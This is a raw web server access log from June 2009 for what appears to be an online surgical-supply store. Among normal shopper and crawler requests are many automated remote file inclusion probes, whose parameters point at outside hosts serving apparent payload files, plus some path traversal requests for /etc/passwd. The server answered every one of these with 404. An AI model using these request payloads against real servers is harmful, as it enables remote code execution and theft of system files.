71.131.191.78 - - [04/Jun/2009:00:17:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057964A0D32F7009EEE00J+M37+ENG HTTP/1.1" 200 42914 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105796480E1287009D4E00J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
76.164.212.18 - - [04/Jun/2009:00:17:49 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
71.131.191.78 - - [04/Jun/2009:00:17:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057964A0D32F7009EEE00J+M37+ENG HTTP/1.1" 200 40715 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105796480E1287009D4E00J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
69.50.197.106 - - [04/Jun/2009:00:17:56 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:17:59 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:18:08 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
71.131.191.78 - - [04/Jun/2009:00:18:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057964A0D32F7009EEE00J+M37+ENG HTTP/1.1" 200 40651 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105796480E1287009D4E00J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
69.50.197.106 - - [04/Jun/2009:00:18:13 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:18:22 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:18:22 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:18:22 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
75.125.245.26 - - [04/Jun/2009:00:18:35 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
71.131.191.78 - - [04/Jun/2009:00:18:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057964A0D32F7009EEE00J+M37+ENG HTTP/1.1" 200 40260 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105796480E1287009D4E00J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
71.131.191.78 - - [04/Jun/2009:00:18:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057964A0D32F7009EEE00J+M37+ENG HTTP/1.1" 200 42014 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105796480E1287009D4E00J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
71.131.191.78 - - [04/Jun/2009:00:18:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057964A0D32F7009EEE00J+M37+ENG HTTP/1.1" 200 41139 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L105796480E1287009D4E00J+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
209.59.12.99 - - [04/Jun/2009:00:19:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [04/Jun/2009:00:20:16 -0400] "GET /logs/access_log.Q109051700//bbs//skin/zero_vote/ask_password.php?dir=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:55 -0400] "GET //cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:55 -0400] "GET /logs//cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:55 -0400] "GET /logs/access_log.Q109053100//cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:55 -0400] "GET /logs/error_log.Q109053100//cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:58 -0400] "GET /logs//cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:58 -0400] "GET //cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:20:58 -0400] "GET /logs/access_log.Q109053100//cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:00:21:32 -0400] "GET /logs/error_log.Q109053100//cross.php?url=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:22:43 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:22:57 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:09 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:09 -0400] "GET //include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:09 -0400] "GET /logs//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:24:09 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:24:09 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:17 -0400] "GET //include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:17 -0400] "GET /logs//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:17 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:17 -0400] "GET //include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:17 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:24:17 -0400] "GET /logs//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:24:37 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:24:37 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:00:24:57 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:25:04 -0400] "GET /logs/access_log.Q109050700%20%20//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:25:16 -0400] "GET /logs/access_log.Q109052200%20%20///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:25:16 -0400] "GET /logs///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:25:16 -0400] "GET ///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:25:21 -0400] "GET /logs/access_log.Q108112300%20%20///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:26:09 -0400] "GET /logs/access_log.Q109052200///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:26:09 -0400] "GET /logs/access_log.Q108112300///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:26:39 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
77.221.130.11 - - [04/Jun/2009:00:26:48 -0400] "GET /logs/access_log.Q109052500///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:26:51 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:26:51 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:26:51 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.6.8.112 - - [04/Jun/2009:00:27:03 -0400] "GET /logs/error_log.Q108052000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.149.85.37 - - [04/Jun/2009:00:27:12 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:27:12 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:27:12 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:27:25 -0400] "GET //include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:27:25 -0400] "GET /logs//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:27:25 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:27:29 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.52.113.18 - - [04/Jun/2009:00:27:30 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:27:45 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:00:27:51 -0400] "GET /logs/error_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
206.225.92.50 - - [04/Jun/2009:00:28:53 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:00:28:53 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 242 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:00:28:53 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:00:28:53 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 241 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
74.6.8.112 - - [04/Jun/2009:00:31:04 -0400] "GET /images/items/EcOm/ HTTP/1.0" 200 2245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.149.85.37 - - [04/Jun/2009:00:31:19 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:31:24 -0400] "GET /logs/access_log.Q109050700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:31:33 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:31:37 -0400] "GET /logs/access_log.Q109050700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
154.20.15.44 - - [04/Jun/2009:00:31:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:31:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:31:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:31:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:31:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
74.6.8.112 - - [04/Jun/2009:00:34:40 -0400] "GET /logs/error_log.Q108050300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.170.83.216 - - [04/Jun/2009:00:35:45 -0400] "GET /http://darknest.gelora.my/idx? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
76.164.212.18 - - [04/Jun/2009:00:35:53 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.170.83.216 - - [04/Jun/2009:00:36:18 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
83.170.83.216 - - [04/Jun/2009:00:36:18 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
83.170.83.216 - - [04/Jun/2009:00:36:18 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
218.149.85.37 - - [04/Jun/2009:00:36:37 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:36:37 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:00:36:37 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.58.178.31 - - [04/Jun/2009:00:37:03 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
83.170.83.216 - - [04/Jun/2009:00:37:04 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
69.58.178.31 - - [04/Jun/2009:00:37:05 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:06 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:08 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:13 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:14 -0400] "GET /logs/ HTTP/1.1" 200 4098 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:15 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:16 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:17 -0400] "GET /images/Office%20Supply/ HTTP/1.1" 200 3623 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.58.178.31 - - [04/Jun/2009:00:37:19 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
76.164.212.18 - - [04/Jun/2009:00:37:48 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.170.83.216 - - [04/Jun/2009:00:38:43 -0400] "GET /logs/access_log.Q109051800/http://darknest.gelora.my/idx? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
83.170.83.216 - - [04/Jun/2009:00:38:43 -0400] "GET /http://darknest.gelora.my/idx? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
83.170.83.216 - - [04/Jun/2009:00:38:43 -0400] "GET /logs/http://darknest.gelora.my/idx? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
154.20.15.44 - - [04/Jun/2009:00:39:24 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM HTTP/1.1" 200 38016 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:26 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:26 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:26 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
154.20.15.44 - - [04/Jun/2009:00:39:26 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bio-ARM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
